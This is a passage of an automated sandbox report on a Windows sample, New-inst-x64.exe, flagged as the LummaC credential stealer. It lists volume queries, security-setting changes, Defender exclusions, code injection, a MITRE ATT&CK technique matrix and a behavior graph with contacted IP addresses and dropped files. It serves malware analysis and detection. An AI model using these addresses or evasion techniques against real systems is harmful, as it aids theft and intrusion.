      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeCode function: 28_2_0045E6D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,28_2_0045E6D7

      Lowering of HIPS / PFW / Operating System Security Settings

      barindex
      Changes security center settings (notifications, updates, antivirus, firewall)
      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;

      Stealing of Sensitive Information

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: 0000001C.00000002.2428475686.00000000026CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: 0000001C.00000002.2428475686.00000000026CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts111
      Windows Management Instrumentation      		1
      DLL Side-Loading      		111
      Process Injection      		11
      Masquerading      		OS Credential Dumping1
      System Time Discovery      		Remote Services1
      Archive Collected Data      		1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading      		21
      Disable or Modify Tools      		LSASS Memory251
      Security Software Discovery      		Remote Desktop ProtocolData from Removable Media11
      Non-Standard Port      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
      Virtualization/Sandbox Evasion      		Security Account Manager2
      Process Discovery      		SMB/Windows Admin SharesData from Network Shared Drive11
      Ingress Tool Transfer      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
      Process Injection      		NTDS41
      Virtualization/Sandbox Evasion      		Distributed Component Object ModelInput Capture1
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information      		LSA Secrets1
      Application Window Discovery      		SSHKeylogging111
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
      Obfuscated Files or Information      		Cached Domain Credentials1
      File and Directory Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
      Software Packing      		DCSync34
      System Information Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      Timestomp      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
      DLL Side-Loading      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1637051 Sample: New-inst-x64.exe Startdate: 13/03/2025 Architecture: WINDOWS Score: 100 65 Suricata IDS alerts for network traffic 2->65 67 Found malware configuration 2->67 69 Malicious sample detected (through community Yara rule) 2->69 71 11 other signatures 2->71 8 New-inst-x64.exe 4 2->8         started        13 svchost.exe 2->13         started        15 svchost.exe 1 1 2->15         started        17 4 other processes 2->17 process3 dnsIp4 57 5.252.153.122, 3000, 49721 WORLDSTREAMNL Russian Federation 8->57 59 138.124.55.36, 49723, 49724, 49725 NOKIA-ASFI Norway 8->59 61 185.170.153.104, 3000, 49720 NODE4-ASGB United Kingdom 8->61 49 C:\Users\user\AppData\...\ztrucvcctzwerxc.exe, PE32+ 8->49 dropped 51 C:\Users\user\AppData\...\mbtbiqwunmmmyby.exe, PE32 8->51 dropped 53 C:\Users\user\AppData\...\xctyuuxnvcrcuez.exe, PE32 8->53 dropped 55 C:\Users\user\AppData\...\vbczvzznbmunxtn.exe, PE32 8->55 dropped 79 Adds a directory exclusion to Windows Defender 8->79 19 vbczvzznbmunxtn.exe 8->19         started        22 cmd.exe 1 8->22         started        24 cmd.exe 8->24         started        26 4 other processes 8->26 81 Changes security center settings (notifications, updates, antivirus, firewall) 13->81 63 127.0.0.1 unknown unknown 15->63 file5 signatures6 process7 signatures8 73 Antivirus detection for dropped file 19->73 75 Contains functionality to inject code into remote processes 19->75 43 26 other processes 19->43 77 Adds a directory exclusion to Windows Defender 22->77 28 powershell.exe 23 22->28         started        31 conhost.exe 22->31         started        33 powershell.exe 24->33         started        35 conhost.exe 24->35         started        37 powershell.exe 11 26->37         started        39 net.exe 1 26->39         started        41 taskkill.exe 1 26->41         started        45 5 other processes 26->45 process9 signatures10 83 Loading BitLocker PowerShell Module 28->83 85 Queries memory information (via WMI often done to detect virtual machines) 37->85 47 net1.exe 1 39->47         started        process11

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.